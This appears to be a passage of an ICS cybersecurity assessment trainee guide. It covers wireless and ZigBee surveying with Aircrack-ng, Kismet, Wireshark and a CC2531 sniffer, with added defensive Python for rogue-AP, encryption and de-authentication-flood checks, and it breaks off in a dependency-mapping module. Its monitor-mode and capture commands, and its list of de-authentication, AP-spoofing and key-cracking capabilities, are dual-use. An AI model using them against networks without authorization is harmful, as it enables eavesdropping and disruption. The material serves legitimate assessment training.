 tkiptun-ng
 wesside-ng
Aircrack-ng uses
 Monitors/captures Wi-Fi packets sent over the air
 Forges fake packets
 Performs fake authentication and keep-alives
 Spoofs APs
 Attacks APs and Wi-Fi clients
 Brute-force decrypts encryption keys or statistically uncovers them
 Creates CSV and PCAP files for later inspection
 Replays fake ARP packets to force AP to reveal #data
 Reveals hidden SSIDs by various methods
 Forces clients to disconnect by de-authentication
Monitor mode
Sets the mode of the Wi-Fi interface into ‘monitor’ mode, where every packet can be seen by the
interface on every network, but it is not connected. ‘Promiscuous’ mode allows capturing packets after
a connection is made to a network.
Once a Wi-Fi interface is in monitor mode, the interface can be used by the listed tools without those
tools needing to do any configuration of their own. So once Aircrack-ng puts a Wi-Fi interface into monitor
mode, Kismet and Wireshark can use the interface to perform further analysis tasks.
Monitor mode allows not only monitoring, but packet injection. It must be stopped in order to return the
Wi-Fi hardware to ‘normal’ use.
airmon-ng
Monitor Mode with airmon-ng

The first step is checking whether there are interfaces already in monitor mode. The tool will let you put an
interface into as many duplicates of monitor mode as you want, but only one will work, and only some of
the time. Most of the time, the interface gets bound up and will not operate. The command will not show
any interfaces until conflicting processes, such as Network Manager, are shut down.

Monitor Mode with airmon-ng check

We can check for troublesome processes by running airmon-ng check. It will find and display the
processes that give the tools the most trouble. The most common is Network Manager, as it is actively
looking to create connections on available interfaces, wired or wireless. If Network Manager is not shut
down, the tools will run intermittently and then stop, since the interface will be taken out of monitor mode.
The processes can be shut down or killed using airmon-ng as shown below, or killed manually by root.
Monitor Mode with airmon-ng check kill

airmon-ng check kill will search and find the troublesome processes and kill them. All the
commands must be run as root. In fact, executables will check to ensure commands are being run by
the root user and warn the user to do so. Run both commands repeatedly until no processes or minimal
processes are running. The second window shows the check command is running and finds no
troublesome processes.
Monitor Mode with airmon-ng

A second run of airmon-ng without parameters shows the interfaces available to be put into monitor mode.
None have been put into monitor mode yet. We are just prepping the system to do so.
Monitor Mode with ifconfig -a

Another check with ifconfig -a verifies we have an interface named wlan0. We are not in monitor mode
yet.
Monitor Mode with airmon-ng start

To put the interface in monitor mode, use airmon-ng start wlan0. This will put the interface into monitor
mode and rename it with the word ‘mon’ embedded in the name. As you can see in this example, wlan0
is morphed into wlan0mon. The new name is used for all tools and commands.

Monitor Mode Complete

Another run of ifconfig verifies the interface has been put into monitor mode. Sometimes, the interface
remains unchanged and a new interface is created. Most of the time this will not work, and the steps
must be started over.
First capture with airodump-ng
Capture with airodump-ng

This is our first session with airodump-ng. This tool will allow us to do the capture of packet data from
the Wi-Fi interface.

A few things to note:
 BSSID – The MAC address of the Access Point (AP). Basic Service Set ID.
 PWR – The received power relative to 1 milliwatt. If an access point broadcasts at 1 milliwatt,
by the time the energy reaches the monitoring interface the power is measured and a number is
derived, which will be less than 1 milliwatt due to the distance traveled. If there were another
access point half the distance away, but broadcasting at half the power, the measurement of both
APs would be the same. It is not exactly half, but that is what the PWR measurement means and
how it is calculated in Aircrack-ng.
 Beacons – The number of beacon packets sent by the APs.
 #Data – The amount of data sent by the AP for some client or other service. This also includes
initialization vectors that can be used to decrypt or derive the key from WEP-based APs.
 #/s – Data packets received per second.
 CH – The channel on which the AP is broadcasting. Where it says ‘CH 8’, this is the channel the
interface is listening to at the moment if it is channel hopping – which, when hopping, it does
about three times per second.
 MB – The speed at which the AP is configured, not the speed at which the packets are traveling.
This is in megabits per second.
 ENC – The encryption type: WEP, WPA, WPA2, WPS, OPN.
 CIPHER – The encryption/security method.
 Auth – PSK is for Pre-Shared Key, such as that used in WPA2. WEP does not usually show
anything here.
 ESSID – The name of the access point. Non-broadcasting APs do not broadcast their ESSID
but do broadcast its length. Extended Service Set ID.
 If there was a GPS location, it would show up to the right of the date and time. Other messages
appear in this area, such as the WPA Handshake message.
NOTE: This screen doesn’t show it, but at the bottom there would be a set of addresses
showing each client and the station it is connected to, along with the name of the client.
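The same columns are written to the CSV file that airodump-ng produces alongside the PCAP when run with -w, which is the file a wireless survey is usually reconciled against an inventory of authorized access points. The Python below is an added example, not course material and not Aircrack-ng code: it parses a constructed CSV in that layout, compares each access point seen against an assumed inventory of authorized BSSIDs, and flags unknown APs, an unknown AP advertising one of the authorized ESSIDs (an evil-twin candidate), an authorized BSSID advertising the wrong name, and any AP with OPN or WEP privacy. All addresses, ESSIDs, counts and the inventory itself are made up.

```python
"""Rogue / weak access-point check over an airodump-ng CSV export.

Added example (not course material, not Aircrack-ng code).  SAMPLE_CSV is a
constructed file in the layout airodump-ng writes with -w (prefix-01.csv):
an access-point table, a blank line, then a station table.  All addresses,
ESSIDs and counts are made up; AUTHORIZED_APS is an assumed site inventory.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2021-03-01 09:00:00, 2021-03-01 09:10:00,  6,  54, WPA2, CCMP, PSK, -41,      600,        0,   0.  0.  0.  0,   9, PLANT-OPS, 
AA:BB:CC:00:00:02, 2021-03-01 09:00:00, 2021-03-01 09:10:00, 11,  54, OPN,     ,    , -67,      310,        0,   0.  0.  0.  0,  10, GUEST-WIFI, 
DE:AD:BE:EF:00:03, 2021-03-01 09:04:00, 2021-03-01 09:10:00,  1,  11, WEP,  WEP,    , -55,      200,     1520,   0.  0.  0.  0,   9, PLANT-OPS, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2021-03-01 09:01:00, 2021-03-01 09:10:00, -50,      420, AA:BB:CC:00:00:01, 
"""

# Assumed inventory of authorized access points: BSSID -> ESSID it should advertise.
AUTHORIZED_APS = {
    "AA:BB:CC:00:00:01": "PLANT-OPS",
    "AA:BB:CC:00:00:02": "GUEST-WIFI",
}

WEAK_PRIVACY = {"OPN", "WEP"}   # no encryption, or encryption whose key is recoverable from traffic


def parse_airodump_csv(text):
    """Return the access-point rows (first table) as dicts keyed by the header names."""
    ap_table = text.replace("\r\n", "\n").strip().split("\n\n")[0]
    reader = csv.reader(io.StringIO(ap_table))
    header = [h.strip() for h in next(reader)]
    rows = []
    for raw in reader:
        if len(raw) < len(header):          # skip blank or truncated lines
            continue
        rows.append({h: v.strip() for h, v in zip(header, raw)})
    return rows


def assess_access_points(rows, authorized):
    """Compare observed APs with the inventory and return a list of findings."""
    findings = []
    corporate_essids = set(authorized.values())

    def add(ap, code, detail):
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "code": code, "detail": detail})

    for ap in rows:
        bssid, essid = ap["BSSID"], ap["ESSID"]
        if bssid not in authorized:
            if essid in corporate_essids:
                # Unknown radio advertising one of our names: evil-twin / rogue AP candidate
                add(ap, "ROGUE_SSID_CLONE", "unknown BSSID advertising an authorized ESSID")
            else:
                add(ap, "UNKNOWN_AP", "BSSID not in authorized inventory")
        elif authorized[bssid] != essid:
            add(ap, "ESSID_MISMATCH", f"expected ESSID {authorized[bssid]!r}")
        if ap["Privacy"] in WEAK_PRIVACY:
            # Maps to the 'No communication encryption' finding; for WEP, '# IV' shows
            # how much keystream material a passive listener has already collected.
            add(ap, "WEAK_ENCRYPTION", f"privacy={ap['Privacy']} ivs={ap['# IV']}")
    return findings


if __name__ == "__main__":
    for f in assess_access_points(parse_airodump_csv(SAMPLE_CSV), AUTHORIZED_APS):
        print(f"{f['bssid']}  {f['essid']:<12} {f['code']:<18} {f['detail']}")
```

Columns are looked up by header name rather than position so the check keeps working if a newer airodump-ng adds columns; an ESSID containing a comma would still need the raw line handled specially.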

First capture with Kismet and Wireshark
When the Wi-Fi interface is in monitor mode, various applications such as Kismet and Wireshark can
also capture packets.
Try these commands:
 Kismet
$> kismet -c wlan0mon
 Wireshark
$> wireshark -k -i wlan0mon
For Kismet: the -c switch specifies the capture device.
For Wireshark: the -k switch starts the capture immediately, and the -i switch specifies the interface
we are using.

Kismet
Similar to Aircrack-ng functionality, Kismet capabilities include:
 Pseudo graphical interface in current stable version. Web interface in the development version.
 Does not contain pen-testing capability
 Client-Server and plug-in architecture
 Output to various file formats
 Capability to monitor other protocols and technology (e.g., Bluetooth, 433 MHz, etc.) based on
plug-ins
Kismet AP Only View
This is the Kismet screen with all other views turned off.

Kismet configuration
 Kismet configuration is all contained within a text file
 Unlike the Aircrack-ng suite, most execution parameters are specified within the Kismet
configuration file, which is located at /etc/kismet/kismet.conf
 Different configuration files can be specified on the command line
Kismet configuration is done mostly with the Kismet configuration text file. This can come in handy
when specifying numerous hosts to avoid or filter. Different configuration files can be specified on the
command line.
Kismet filtering
Kismet filtering is much more flexible than airodump-ng. The first filter_tracker defines a filter to
show the AP with the given MAC address and capture its data. The filters with the ‘!’ character are negations
on the MAC address, meaning leave this one out of the captures.

Kismet channel graph


The Kismet Channel Graph shows the activity of the APs in the area. The top (amber) shows signal
activity and on what channels. It is kind of a crude spectrum analyzer. The lower graph (green) is the
data and on what channel it is coming through. As you can see, there is activity on Channel 1 and on
Channels 6 and 11. Further down there is activity on Channel 36, Channel 116, 132 and 157. This is a
quick way to see activities on channels actively doing something, which could show activity that should
not be in the area.

Mobile analyzers
There are several available applications for Android systems that can be used to evaluate nearby
wireless signals. These tools offer a useful graphical representation of different signals and their
corresponding strength from the perspective of the analyzer.
 Wi-Fi Analyzer – A widely used Wi-Fi analyzing application for Android
 OpenSignal – A Wi-Fi and phone signal analyzer that includes geographical maps with signals
imposed
 Wi-Fi Monitor – A Microsoft-produced Wi-Fi analyzer

Texas Instruments packet sniffing instructions


IEEE 802.15.4 packet capture

IEEE 802.15.4 capture commands
 Running the first command hops the channels, puts the packets in the file and shows on the
screen which channels have activity.
$> ./cc2531sniffer.py -d -z -p mycapture.pcap
 The second command starts capturing data on Channel 13 and redirects packet data to a
filesystem pipe. The script prompts for an action; type ‘s’ to start the process. This command
stops any data from displaying on the screen, so the next command must be run in order to see
the data.
$> ./cc2531sniffer.py -c 13 -f /tmp/sniffpipe
 The third command is run in another terminal and tells Wireshark to start capturing data from
/tmp/sniffpipe and immediately display the results. IEEE 802.15.4 data will then be displayed as it
is captured.
$> wireshark -k -i /tmp/sniffpipe
 Ensure Wireshark is interpreting the data correctly by going to Edit->Preferences->Protocols->IEEE
802.15.4->FCS Format=TI CC25xx metadata. If this is not set, the data will be interpreted only
as IEEE 802.15.4 and the ZigBee network stack will be ignored.

Wireless packet analysis - ZigBee

IEEE 802.15 packet analysis
 Analyze IEEE 802.15 packets
 Identify open vs. secured network
 Identify Coordinator versus End Devices
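As an added illustration of these three analysis tasks (not code from the course, nor from any of the sniffer tools named later on this page), the Python below decodes the IEEE 802.15.4 MAC header and the ZigBee NWK header of constructed frames, with the FCS omitted, and reports whether each frame is secured at the MAC or NWK layer and which short address belongs to the Coordinator. It relies on two facts of the standards: a beacon's superframe specification carries a PAN Coordinator bit, and the ZigBee Coordinator always holds short address 0x0000. A single frame cannot tell a Router from an End Device, so every other address is reported as "Router/End Device". The PAN ID 0x1234, the device address 0x3A4B and all payload bytes are made up.

```python
"""Open vs. secured, and who is the Coordinator, from raw IEEE 802.15.4 / ZigBee frames.

Added example (not course material, not code from any sniffer tool).  The three
frames below are constructed (FCS omitted): a beacon from the PAN Coordinator, a
NWK-secured data frame from an End Device to the Coordinator, and an unsecured
data frame back.  PAN ID 0x1234, address 0x3A4B and all payload bytes are made up.
"""

MAC_TYPES = {0: "beacon", 1: "data", 2: "ack", 3: "command"}
ADDR_NONE, ADDR_SHORT, ADDR_EXT = 0, 2, 3
ZIGBEE_COORDINATOR_ADDR = 0x0000      # the ZigBee Coordinator always owns short address 0x0000


def parse_mac(frame):
    """Decode the 802.15.4 MAC header: frame control, sequence number, addressing fields."""
    fcf = int.from_bytes(frame[0:2], "little")
    info = {
        "mac_type": MAC_TYPES[fcf & 0x7],          # bits 0-2: frame type
        "mac_security": bool(fcf & 0x0008),        # bit 3: MAC-layer security enabled
        "pan_compression": bool(fcf & 0x0040),     # bit 6: source PAN ID omitted
        "seq": frame[2],
    }
    dst_mode, src_mode = (fcf >> 10) & 0x3, (fcf >> 14) & 0x3
    i = 3
    if dst_mode != ADDR_NONE:
        info["dst_pan"] = int.from_bytes(frame[i:i + 2], "little")
        i += 2
        n = 2 if dst_mode == ADDR_SHORT else 8
        info["dst"] = int.from_bytes(frame[i:i + n], "little")
        i += n
    if src_mode != ADDR_NONE:
        if not (info["pan_compression"] and dst_mode != ADDR_NONE):
            info["src_pan"] = int.from_bytes(frame[i:i + 2], "little")
            i += 2
        n = 2 if src_mode == ADDR_SHORT else 8
        info["src"] = int.from_bytes(frame[i:i + n], "little")
        i += n
    info["payload"] = frame[i:]
    return info


def parse_beacon(payload):
    """Superframe specification: bit 14 = PAN Coordinator, bit 15 = Association Permit."""
    superframe = int.from_bytes(payload[0:2], "little")
    return {"pan_coordinator": bool(superframe & 0x4000),
            "association_permit": bool(superframe & 0x8000)}


def parse_nwk(payload):
    """ZigBee NWK header: frame control (bit 9 = security), dst, src, radius, sequence."""
    fc = int.from_bytes(payload[0:2], "little")
    return {
        "nwk_type": "data" if (fc & 0x3) == 0 else "command",
        "protocol_version": (fc >> 2) & 0xF,
        "nwk_security": bool(fc & 0x0200),
        "nwk_dst": int.from_bytes(payload[2:4], "little"),
        "nwk_src": int.from_bytes(payload[4:6], "little"),
        "radius": payload[6],
        "nwk_seq": payload[7],
    }


def classify(frame):
    """Per-frame verdict: is it secured at any layer, and what roles do the addresses imply."""
    mac = parse_mac(frame)
    out = {"mac_type": mac["mac_type"], "secured": mac["mac_security"], "roles": {}}
    if mac["mac_type"] == "beacon":
        beacon = parse_beacon(mac["payload"])
        if beacon["pan_coordinator"] and "src" in mac:
            out["roles"][mac["src"]] = "Coordinator"
        out["association_permit"] = beacon["association_permit"]
    elif mac["mac_type"] == "data":
        nwk = parse_nwk(mac["payload"])
        out["secured"] = out["secured"] or nwk["nwk_security"]
        for addr in (nwk["nwk_src"], nwk["nwk_dst"]):
            role = "Coordinator" if addr == ZIGBEE_COORDINATOR_ADDR else "Router/End Device"
            out["roles"][addr] = role
    return out


def summarize_pan(frames):
    """Aggregate over a capture: secured / open / mixed data traffic, plus node roles."""
    verdicts = [classify(f) for f in frames]
    roles = {}
    for v in verdicts:
        roles.update(v["roles"])
    data = [v for v in verdicts if v["mac_type"] == "data"]
    secured = sum(1 for v in data if v["secured"])
    open_ = len(data) - secured
    if not data:
        status = "unknown"
    elif open_ == 0:
        status = "secured"
    elif secured == 0:
        status = "open"
    else:
        status = "mixed"            # cleartext frames on a PAN that also uses security
    return {"secured_frames": secured, "open_frames": open_, "status": status,
            "coordinators": sorted(a for a, r in roles.items() if r == "Coordinator"),
            "other_nodes": sorted(a for a, r in roles.items() if r != "Coordinator")}


# Constructed frames (hex, FCS omitted).
BEACON_FRAME = bytes.fromhex(
    "0080"                      # MAC FCF 0x8000: beacon, src addr mode = short, no dst addressing
    "01" "3412" "0000"          # sequence, src PAN ID 0x1234, src short address 0x0000 (Coordinator)
    "ffcf" "00" "00"            # superframe 0xCFFF (PAN Coordinator + Association Permit), GTS, pending
    "00" "22" "84" "0011223344556677" "ffffff" "00")   # ZigBee beacon payload (constructed)
SECURED_DATA_FRAME = bytes.fromhex(
    "6188" "02" "3412" "0000" "4b3a"   # MAC FCF 0x8861 (data, PAN compression), 0x3A4B -> 0x0000
    "0802" "0000" "4b3a" "1e" "55"     # NWK FC 0x0208: data, version 2, SECURITY bit set; dst, src, radius, seq
    "28" "01000000" "aabbccddeeff0011" "00" "deadbeef" "cafebabe")  # aux security header, ciphertext, MIC
OPEN_DATA_FRAME = bytes.fromhex(
    "6188" "03" "3412" "4b3a" "0000"   # MAC: Coordinator 0x0000 -> 0x3A4B, no MAC security
    "0800" "4b3a" "0000" "1e" "56"     # NWK FC 0x0008: data, version 2, NO security
    "0001020304")                      # cleartext APS payload (placeholder bytes)
SAMPLE_FRAMES = [BEACON_FRAME, SECURED_DATA_FRAME, OPEN_DATA_FRAME]

if __name__ == "__main__":
    print(summarize_pan(SAMPLE_FRAMES))
```

On the constructed capture the summary reports one secured and one open data frame, so the PAN is "mixed": exactly the situation where a site believes it has turned ZigBee security on but some devices still talk in the clear.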

ZigBee assessment tools


Here is a set of tools that could be used to capture and view ZigBee packet data.
TI Packet Sniffer, which only works in MS Windows, was created to help the developer build messaging
between different TI components and different communications protocols. ZigBee is one of many
protocols that can be sniffed and reviewed. It requires knowledge of the channel and the protocol
being used, but it can be used to decode ZigBee packet data.
Because we are using the TI CC2531 USB dongle, only 2.4 GHz traffic is being monitored. Messaging in the
900 MHz band could be monitored with the TI CC1111 USB dongle. As a reminder, there are few
implementations in the 900 MHz range with standard ZigBee. Most applications are in the 2.4 GHz
range amongst the many ZigBee device manufacturers.
GNU Radio can also be used to monitor ZigBee using a GNU Radio package with associated flow
graphs by the name of gr-ieee802-15-4.
It can be found here: https://github.com/bastibl/gr-ieee802-15-4.
There are many CC2531 Python sniffer scripts available online that could be downloaded and used at
the command line. We have two, one for 2.4 GHz and one for 900 MHz. The script name is
cc2531sniffer.py, and it has many switches.

To search for the channel that 802.15.4 is broadcasting on with the CC2531 dongle, use:
./cc2531sniffer.py -d -z
This will hop channels and display a flag for each channel on which activity was found.
Once a channel has been determined, run:
./cc2531sniffer.py -d -c [THECHANNEL] -p [PCAPFILE] -D DEBUG -L [LOGFILE]
Example: ./cc2531sniffer.py -d -c 16 -p myzcapture.pcap -D DEBUG -L sniff.log
Open the PCAP file in Wireshark to analyze.

ZigBee security – false

ZigBee security – true

ZigBee transport key

Wireshark packet analysis - Wi-Fi
Wireshark is a packet analysis tool that can be used for additional Wi-Fi packet analysis. It is mainly
used to analyze packets not previously analyzed in Aircrack-ng or Kismet, such as de-authentication
packets. Determining the security level is a little more difficult in Wireshark than in the other tools, but
it can be used to capture packets directly on a monitor-mode interface and to analyze data within PCAP
files.
Wireshark Wi-Fi beacons
In the image below, the red box within the display filter shows us how to filter on Beacons if there are
numerous packets in the file or stream.

Wireshark Wi-Fi privacy bit
The Privacy bit appears in the capability information of every Beacon and indicates that the data is
encrypted. If it is not set, it is likely an OPEN access point.

Wi-Fi WEP identification


For WEP, the RSN field is not set and there is no WPA field either.

Wi-Fi WPA2
For WPA2, the RSN field exists along with the WPA Information packet. The Privacy bit must also be
set.

Wireshark Wi-Fi de-authentication


De-authentication packets are rarely sent relative to the amount of data and other packets. When there
is an attack, the number of de-authentications may rise significantly, and the packet data will name the
targeted hosts. De-authentication packets are usually not visible in the other Wi-Fi tools such as
Aircrack-ng or Kismet.
De-authentication is management frame subtype 12. This information can be found in the included
documentation.
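Both checks on this page, the Privacy bit plus the RSN and WPA information elements for the security level of a beacon, and management subtype 12 for de-authentication, can be automated over a capture rather than read off one packet at a time. The Python below is an added example, not course material and not Wireshark or Aircrack-ng code: it builds a few constructed 802.11 management frames (no radiotap header, FCS stripped), classifies each beacon as OPEN, WEP, WPA or WPA2 by the same rules the slides describe, and flags a BSSID whose de-authentication frames exceed a threshold inside a sliding one-second window, which is the rise in de-authentications the text names as the sign of an attack. BSSIDs, SSIDs, timings and the threshold of ten frames per second are all assumed values.

```python
"""Beacon security classification and de-authentication flood detection for 802.11.

Added example (not course material, not Wireshark or Aircrack-ng code).  All frames
are constructed here: no radiotap header, FCS stripped, addresses and SSIDs made up.
The flood threshold (more than 10 de-auths from one BSSID inside one second) is an
assumed tuning value, not a figure from the course.
"""
from collections import defaultdict

SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12    # management (type 0) subtypes
PRIVACY_BIT = 0x0010                      # capability information, bit 4
RSN_TAG, VENDOR_TAG = 48, 221             # element IDs: RSN (WPA2), vendor-specific
WPA_OUI_TYPE = bytes.fromhex("0050f201")  # Microsoft OUI + type 1 = WPA1 element


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, addr1, addr2, bssid, body):
    """FC(2) Duration(2) Addr1 Addr2 Addr3 SeqCtl(2), then the frame body."""
    fc = bytes([subtype << 4, 0x00])               # type 0 = management, version 0
    return (fc + b"\x00\x00" + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(bssid) + b"\x00\x00" + body)


def build_beacon(bssid, ssid, privacy, extra_ies=b""):
    capability = 0x0001 | (PRIVACY_BIT if privacy else 0)         # ESS (+ Privacy)
    fixed = bytes(8) + (100).to_bytes(2, "little") + capability.to_bytes(2, "little")
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode()
    rates_ie = bytes([1, 1, 0x82])                                 # 1 Mbps basic rate
    return build_mgmt_frame(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", bssid, bssid,
                            fixed + ssid_ie + rates_ie + extra_ies)


def build_deauth(bssid, station, reason=7):
    return build_mgmt_frame(SUBTYPE_DEAUTH, station, bssid, bssid, reason.to_bytes(2, "little"))


# RSN element: version 1, group CCMP, pairwise CCMP, AKM PSK, capabilities 0
RSN_IE = bytes([RSN_TAG, 20]) + bytes.fromhex("0100000fac040100000fac040100000fac020000")
# WPA1 vendor element: OUI 00:50:F2 type 1, version 1 (only the OUI/type is checked below)
WPA_IE = bytes([VENDOR_TAG, 6]) + WPA_OUI_TYPE + bytes.fromhex("0100")


def parse_ies(data):
    """Split tagged parameters into (element_id, value) pairs."""
    ies, i = [], 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        ies.append((tag, data[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def parse_80211(frame):
    """Decode frame control and addresses; fill in beacon or de-auth specifics."""
    info = {"type": (frame[0] >> 2) & 0x3, "subtype": (frame[0] >> 4) & 0xF,
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}
    body = frame[24:]
    if info["type"] == 0 and info["subtype"] == SUBTYPE_BEACON:
        capability = int.from_bytes(body[10:12], "little")    # after timestamp(8) + interval(2)
        ies = parse_ies(body[12:])
        info["privacy"] = bool(capability & PRIVACY_BIT)
        info["ssid"] = next((v.decode(errors="replace") for t, v in ies if t == 0), "")
        info["has_rsn"] = any(t == RSN_TAG for t, _ in ies)
        info["has_wpa"] = any(t == VENDOR_TAG and v.startswith(WPA_OUI_TYPE) for t, v in ies)
    elif info["type"] == 0 and info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"] = int.from_bytes(body[0:2], "little")
    return info


def beacon_security(info):
    """The decision the slides describe: Privacy bit, then RSN, then WPA, else WEP."""
    if not info["privacy"]:
        return "OPEN"
    if info["has_rsn"]:
        return "WPA2"
    if info["has_wpa"]:
        return "WPA"
    return "WEP"


def detect_deauth_flood(timed_frames, window=1.0, threshold=10):
    """Return {bssid: peak count} for BSSIDs sending more than `threshold` de-auths in any window."""
    times = defaultdict(list)
    for t, frame in timed_frames:
        p = parse_80211(frame)
        if p["type"] == 0 and p["subtype"] == SUBTYPE_DEAUTH:
            times[p["bssid"]].append(t)
    flagged = {}
    for bssid, ts in times.items():
        ts.sort()
        start = peak = 0
        for end in range(len(ts)):                  # sliding window over sorted times
            while ts[end] - ts[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[bssid] = peak
    return flagged


# Constructed capture: beacons of four security levels, one ordinary de-auth from a
# second AP, then a burst of 25 de-auths in half a second from AP against one station.
AP = "aa:bb:cc:00:00:01"
BEACON_WPA2 = build_beacon(AP, "PLANT-OPS", True, RSN_IE)
BEACON_WPA = build_beacon("aa:bb:cc:00:00:02", "LEGACY", True, WPA_IE)
BEACON_WEP = build_beacon("aa:bb:cc:00:00:03", "OLD-HMI", True)
BEACON_OPEN = build_beacon("aa:bb:cc:00:00:04", "GUEST", False)
SAMPLE_STREAM = [(0.0, BEACON_WPA2), (0.1, BEACON_OPEN),
                 (0.5, build_deauth("aa:bb:cc:00:00:02", "11:22:33:44:55:66"))]
SAMPLE_STREAM += [(1.0 + 0.02 * i, build_deauth(AP, "11:22:33:44:55:66")) for i in range(25)]

if __name__ == "__main__":
    for b in (BEACON_WPA2, BEACON_WPA, BEACON_WEP, BEACON_OPEN):
        p = parse_80211(b)
        print(f"{p['bssid']}  {p['ssid']:<10} {beacon_security(p)}")
    print("de-auth flood:", detect_deauth_flood(SAMPLE_STREAM))
```

The beacon rule mirrors the three slides: no Privacy bit means OPEN, Privacy with an RSN element means WPA2, Privacy with only the WPA vendor element means WPA, and Privacy with neither is WEP. In a real capture the timestamps come from the PCAP record header, and the window and threshold should be tuned to the site's normal roaming churn before the alert is trusted.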

Wireless Recap
Evaluation questions
During this step, you can ask the following questions to identify any gaps.
 Does the organization maintain an inventory of authorized wireless access points connected to
the wired network?
 Is the use of personally owned, removable media prohibited on the system?
 Does the organization use wireless intrusion detection systems (WIDS) to identify rogue
wireless devices and detect attack attempts and successful compromises?
 Are network vulnerability scanning tools configured to detect and alert on unauthorized wireless
access points connected to the wired network?
 Is each mobile device connection to the system authorized?
 Are requirements for mobile device connection to the system enforced?
 Are unauthorized remote connections monitored, including scanning for unauthorized mobile or
wireless access points on a defined frequency, and is action taken if unauthorized connections are
discovered?

Cybersecurity plan mapping

Common issues/findings
 No communication encryption - Encryption is not used to protect information passed
within the system.
 Wireless access control - There is no mechanism to verify or limit connections to
company-owned devices.
 Direct access to control system via Wi-Fi – Wi-Fi connected devices have the ability to
control and make changes to the ICS.

Step 4 – Determine
ICS Dependencies
Internal and external dependencies

TRAINEE GUIDE

Outcomes
In this section we will delve into infrastructure dependencies, both internal and external to ICS
systems. This brings us to Step 4 within our process, Determine ICS Dependencies.

Learning Objective 6
Determine ICS dependencies
Infrastructure and their dependencies
Infrastructure: _____________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
_____________________________________
Dependency: ______________________________________________________________________
__________________________________________________________________________________
_________________________________________________

Topics covered in this module:
Interdependency:
 What is the big picture?
 How do infrastructure sectors fit into this?
 How does your site or asset look from the outside?
Intradependency:
 What to focus on in your business or facility?
 What is the cyber focus?
 What can we do to understand and plan for dependencies?

Critical Infrastructure sectors

Lifeline sectors
Of the sixteen, four are essential to the operation of the other critical infrastructure sectors. These are
called “Lifeline” sectors:
• __________________________________
• __________________________________
• __________________________________
• __________________________________

Every critical infrastructure sector relies on one or more of the lifeline sectors (Water, Energy,
Communications, and Transportation) to maintain functionality. But that reliance upon those sectors is
also true of each of the lifeline sectors themselves. For example, the Energy and Communications
sectors have a foundational role in the operations of other sectors’ systems. But both Energy and
Communications services are also reliant on each other to maintain that baseline functionality – in the
case of the Energy Sector, Industrial Control System and vulnerability management is dependent on
reliable network service; for the Communications Sector, electricity underpins the ability for those and
other network capabilities. In addition, the Energy Sector is reliant upon both the Water and
Transportation sectors, for cooling and the transit of precursor materials, respectively.
Dependency
What does your company depend on from outside? Could be multiple sectors listed above, including
but not limited to the Lifeline sectors.

Dependency types
Cross-Sector Dependency
A dependency between infrastructure from different sectors (e.g., water and energy).
Interdependency
The products or services provided to one infrastructure by another external infrastructure that are
necessary to support its operations and functions.

Cross-Sector Dependency
A dependency between infrastructure from different sectors (e.g., water and energy).
[Figure: Wastewater Treatment Facility, Natural Gas Plant]
How does your company depend on other companies and how do they depend on you?

Interdependency
The products or services provided to one
infrastructure by another external
infrastructure that are necessary to support
its operations and function.
Each layer beyond the initial layer of utilities, systems, and people may comprise a system in and of
itself that needs to be identified by its boundaries.

Intradependency
The interactions among internal operations,
functions, and missions of the infrastructure.
Internal dependencies are the internal links among
the assets constituting a critical infrastructure (e.g.,
an electric generating plant that depends on cooling
water from its own onsite water well).
• How do we evaluate the big picture and then
filter down to the small picture?
• How are the Assets (Functions) laid out?
 Use your network map (or
discovery).
 Discuss with site engineers to
determine flow of Functions.
• What are the company’s business (ICS) process functions?
 List the main systems and determine what function (or process) they provide.
 List the sub-systems and determine what function (or process) they provide.
 Validate your network/asset inventory.

• What are the company’s auxiliary (ICS) process functions?
 May or may not be directly related to main business process.
 Some examples: Security systems, HVAC, Power (main and backup), Wireless.
Business (ICS) process function example:
Here is an example of a Business (ICS) Process function. We will be looking at the Headworks
building and the process around it.
See Appendix B for additional information related to the Deer Island Treatment Plant.
[Figure: Main Control Building]
Auxiliary (ICS) Functions
 What are the other factors around the process?
 How do you determine what is Intradependent in the Headworks building? Ask:
o What is located in the main control building?
o HVAC controls?
o Operation stations?
o Backbone for the control network?
o Historians and data transfer from the ICS network to the business network?
Business ICS Process Functions
 How do you determine business process connectivity?
 Functions that are directly part of the ICS Network.
o Will depend on your site.
o Parts of the site process that the ICS controls and monitors.
 Some connectivity examples that Deer Island could have:
o PLC
o RTU
o DCS computers
o Network switches
o Firewalls
o Network traffic flow

Business (ICS) process functions (continued)
Let’s look closely at this network diagram. If this were the setup in Deer Island, what would the Process
area be dependent on?

Auxiliary (ICS) functions (continued)


 How do you define Auxiliary Functions?
o Functions that are not directly part of the ICS network.
o Depends on your site.
o May include items attached to the Business (ICS) Process Function but on separate
networks.
o Are there any Dependencies for this equipment?
 Some examples that Deer Island could have.
o Map out what they have.
o Talk to Site Security Specialist
o Talk to Site engineers

Using the same diagram as seen above, what would the auxiliary area be dependent on? What servers
would need to talk to each other?

Understand criticality and risk

Criticality: ____________________________________________________________________
Risk: _________________________________________________________________________

 Focus on Risk and Criticality inside your Asset (functions).


 Evaluate the Risk and Criticality on both an Interdependency and Intradependency level. The
main purpose is to focus on anything that falls into a high category, depending on your site.
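The dependency mapping and criticality evaluation described above, worked through in code as an added example (not part of the original guide). It classifies each link as an intradependency or interdependency by ownership, validates the inventory, and ranks assets by how many functions are lost if they fail; every asset name, owner and link is constructed for illustration and is not Deer Island's real configuration.

```python
"""Dependency mapping for an ICS site: classify dependencies as intra- or
interdependencies, validate the asset inventory, and rank assets by the
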